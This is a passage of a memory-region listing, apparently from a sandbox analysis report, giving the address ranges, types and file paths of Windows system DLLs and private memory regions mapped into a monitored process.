end_va = 0x7fefbb18fff
monitored = 0
entry_point = 0x7fefbb11010
region_type = mapped_file
name = "avrt.dll"
filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")
Region:
id = 4099
start_va = 0x7fefbc00000
end_va = 0x7fefbc2cfff
monitored = 0
entry_point = 0x7fefbc01010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4100
start_va = 0x7fefbda0000
end_va = 0x7fefbdb4fff
monitored = 0
entry_point = 0x7fefbda1050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 4101
start_va = 0x7fefbdc0000
end_va = 0x7fefbdcbfff
monitored = 0
entry_point = 0x7fefbdc18a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 4102
start_va = 0x7fefbdd0000
end_va = 0x7fefbde5fff
monitored = 0
entry_point = 0x7fefbdd11a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 4103
start_va = 0x7fefbf00000
end_va = 0x7fefbf10fff
monitored = 0
entry_point = 0x7fefbf01070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 4104
start_va = 0x7fefc060000
end_va = 0x7fefc094fff
monitored = 0
entry_point = 0x7fefc061064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 4105
start_va = 0x7fefc4d0000
end_va = 0x7fefc525fff
monitored = 0
entry_point = 0x7fefc4dbbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4106
start_va = 0x7fefc530000
end_va = 0x7fefc65bfff
monitored = 0
entry_point = 0x7fefc5394bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 4107
start_va = 0x7fefc660000
end_va = 0x7fefc67cfff
monitored = 0
entry_point = 0x7fefc661ef4
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 4108
start_va = 0x7fefc6b0000
end_va = 0x7fefc8a3fff
monitored = 0
entry_point = 0x7fefc83c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 4109
start_va = 0x7fefcd40000
end_va = 0x7fefcd4bfff
monitored = 0
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 4110
start_va = 0x7fefce10000
end_va = 0x7fefce16fff
monitored = 0
entry_point = 0x7fefce114b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 4111
start_va = 0x7fefced0000
end_va = 0x7fefcedcfff
monitored = 0
entry_point = 0x7fefced1348
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 4112
start_va = 0x7fefcf10000
end_va = 0x7fefcf2afff
monitored = 0
entry_point = 0x7fefcf12068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 4113
start_va = 0x7fefcf30000
end_va = 0x7fefcf4dfff
monitored = 0
entry_point = 0x7fefcf313b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 4114
start_va = 0x7fefd000000
end_va = 0x7fefd038fff
monitored = 0
entry_point = 0x7fefd00c0f0
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 4115
start_va = 0x7fefd050000
end_va = 0x7fefd059fff
monitored = 0
entry_point = 0x7fefd053b40
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 4116
start_va = 0x7fefd060000
end_va = 0x7fefd069fff
monitored = 0
entry_point = 0x7fefd063cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 4117
start_va = 0x7fefd190000
end_va = 0x7fefd1d6fff
monitored = 0
entry_point = 0x7fefd191064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4118
start_va = 0x7fefd280000
end_va = 0x7fefd2affff
monitored = 0
entry_point = 0x7fefd28194c
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 4119
start_va = 0x7fefd420000
end_va = 0x7fefd426fff
monitored = 0
entry_point = 0x7fefd42142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 4120
start_va = 0x7fefd430000
end_va = 0x7fefd484fff
monitored = 0
entry_point = 0x7fefd431054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 4121
start_va = 0x7fefd490000
end_va = 0x7fefd4a7fff
monitored = 0
entry_point = 0x7fefd493b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 4122
start_va = 0x7fefd5a0000
end_va = 0x7fefd5d1fff
monitored = 0
entry_point = 0x7fefd5a144c
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 4123
start_va = 0x7fefd660000
end_va = 0x7fefd68efff
monitored = 0
entry_point = 0x7fefd661064
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 4124
start_va = 0x7fefd6a0000
end_va = 0x7fefd70cfff
monitored = 0
entry_point = 0x7fefd6a1010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 4125
start_va = 0x7fefd970000
end_va = 0x7fefd992fff
monitored = 0
entry_point = 0x7fefd971198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 4126
start_va = 0x7fefda10000
end_va = 0x7fefda1afff
monitored = 0
entry_point = 0x7fefda11030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 4127
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4128
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 4129
start_va = 0x7fefda80000
end_va = 0x7fefdb10fff
monitored = 0
entry_point = 0x7fefda81440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 4130
start_va = 0x7fefdb20000
end_va = 0x7fefdb5cfff
monitored = 0
entry_point = 0x7fefdb218f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 4131
start_va = 0x7fefdb60000
end_va = 0x7fefdb73fff
monitored = 0
entry_point = 0x7fefdb610e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 4132
start_va = 0x7fefdb80000
end_va = 0x7fefdb8efff
monitored = 0
entry_point = 0x7fefdb819b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4133
start_va = 0x7fefdc20000
end_va = 0x7fefdc2efff
monitored = 0
entry_point = 0x7fefdc21020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4134
start_va = 0x7fefdcd0000
end_va = 0x7fefdce9fff
monitored = 0
entry_point = 0x7fefdcd1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 4135
start_va = 0x7fefdcf0000
end_va = 0x7fefdd2afff
monitored = 0
entry_point = 0x7fefdcf1324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 4136
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4137
start_va = 0x7fefdda0000
end_va = 0x7fefddd5fff
monitored = 0
entry_point = 0x7fefdda1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 4138
start_va = 0x7fefdde0000
end_va = 0x7fefdf4cfff
monitored = 0
entry_point = 0x7fefdde10b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4139
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4140
start_va = 0x7fefdf60000
end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4141
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4142
start_va = 0x7fefe110000
end_va = 0x7fefe161fff
monitored = 0
entry_point = 0x7fefe1110d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4143
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 4144
start_va = 0x7fefe210000
end_va = 0x7fefe280fff
monitored = 0
entry_point = 0x7fefe221e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4145
start_va = 0x7fefe4f0000
end_va = 0x7feff277fff
monitored = 0
entry_point = 0x7fefe56cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 4146
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4147
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4148
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4149
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4150
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4151
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4152
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4153
start_va = 0x7feff990000
end_va = 0x7feffb66fff
monitored = 0
entry_point = 0x7feff991010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 4154
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4155
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4156
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4157
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4158
start_va = 0x7fffff96000
end_va = 0x7fffff97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff96000"
filename = ""
Region:
id = 4159
start_va = 0x7fffff98000
end_va = 0x7fffff99fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff98000"
filename = ""
Region:
id = 4160
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 4161
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 4162
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 4163
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 4164
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 4165
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 4166
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 4167
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 4168
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 4169
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 4170
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 4171
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4172
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 4173
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 4174
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 4175
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 4176
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 4177
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 4178
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 4206
start_va = 0x1e10000
end_va = 0x1e8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e10000"
filename = ""
Region:
id = 4207
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 4208
start_va = 0xa60000
end_va = 0xa6ffff
monitored = 0
entry_point = 0xa63e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 4209
start_va = 0x10a0000
end_va = 0x111ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010a0000"
filename = ""
Region:
id = 4210
start_va = 0xa70000
end_va = 0xa73fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 4211
start_va = 0xa60000
end_va = 0xa6ffff
monitored = 0
entry_point = 0xa63e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 4212
start_va = 0xa70000
end_va = 0xa73fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 4213
start_va = 0x1e70000
end_va = 0x1eeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e70000"
filename = ""
Region:
id = 4214
start_va = 0x7fefa2e0000
end_va = 0x7fefa319fff
monitored = 0
entry_point = 0x7fefa2fd020
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 4215
start_va = 0x7fffff92000
end_va = 0x7fffff93fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff92000"
filename = ""
Region:
id = 4216
start_va = 0x7fefa260000
end_va = 0x7fefa2d6fff
monitored = 0
entry_point = 0x7fefa29e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 4217
start_va = 0x7fefd5e0000
end_va = 0x7fefd601fff
monitored = 0
entry_point = 0x7fefd5e5d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 4230
start_va = 0x1db0000
end_va = 0x1e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001db0000"
filename = ""
Region:
id = 4231
start_va = 0x7fefa050000
end_va = 0x7fefa08cfff
monitored = 0
entry_point = 0x7fefa051070
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 4232
start_va = 0x7fffff90000
end_va = 0x7fffff91fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 4233
start_va = 0x7fefb670000
end_va = 0x7fefb696fff
monitored = 0
entry_point = 0x7fefb6798bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 4234
start_va = 0x7fefb660000
end_va = 0x7fefb66afff
monitored = 0
entry_point = 0x7fefb661198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 4235
start_va = 0x7fefa020000
end_va = 0x7fefa044fff
monitored = 0
entry_point = 0x7fefa038c54
region_type = mapped_file
name = "browser.dll"
filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll")
Region:
id = 4236
start_va = 0x1f80000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f80000"
filename = ""
Region:
id = 4237
start_va = 0x7fef9f80000
end_va = 0x7fefa011fff
monitored = 0
entry_point = 0x7fef9ff51ec
region_type = mapped_file
name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 4238
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 4239
start_va = 0x7fefcd50000
end_va = 0x7fefce0afff
monitored = 0
entry_point = 0x7fefcd56de0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 4240
start_va = 0x7fefb050000
end_va = 0x7fefb0a2fff
monitored = 0
entry_point = 0x7fefb052b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 4241
start_va = 0x7fefbc30000
end_va = 0x7fefbc40fff
monitored = 0
entry_point = 0x7fefbc314c0
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 4242
start_va = 0x7fef9f30000
end_va = 0x7fef9f71fff
monitored = 0
entry_point = 0x7fef9f317e4
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 4243
start_va = 0x7fef9ee0000
end_va = 0x7fef9f26fff
monitored = 0
entry_point = 0x7fef9ee1040
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 4244
start_va = 0x2000000
end_va = 0x21cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 4245
start_va = 0x21d0000
end_va = 0x236ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021d0000"
filename = ""
Region:
id = 4246
start_va = 0x2370000
end_va = 0x256ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002370000"
filename = ""
Region:
id = 4247
start_va = 0x743e0000
end_va = 0x743e1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netmsg.dll"
filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll")
Region:
id = 4248
start_va = 0xa60000
end_va = 0xa8ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netmsg.dll.mui"
filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui")
Region:
id = 4249
start_va = 0x1cf0000
end_va = 0x1d6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cf0000"
filename = ""
Region:
id = 4250
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 4259
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4260
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4261
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4262
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4263
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4264
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4265
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4266
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4267
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4268
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4269
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4270
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4271
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4272
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4273
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4274
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
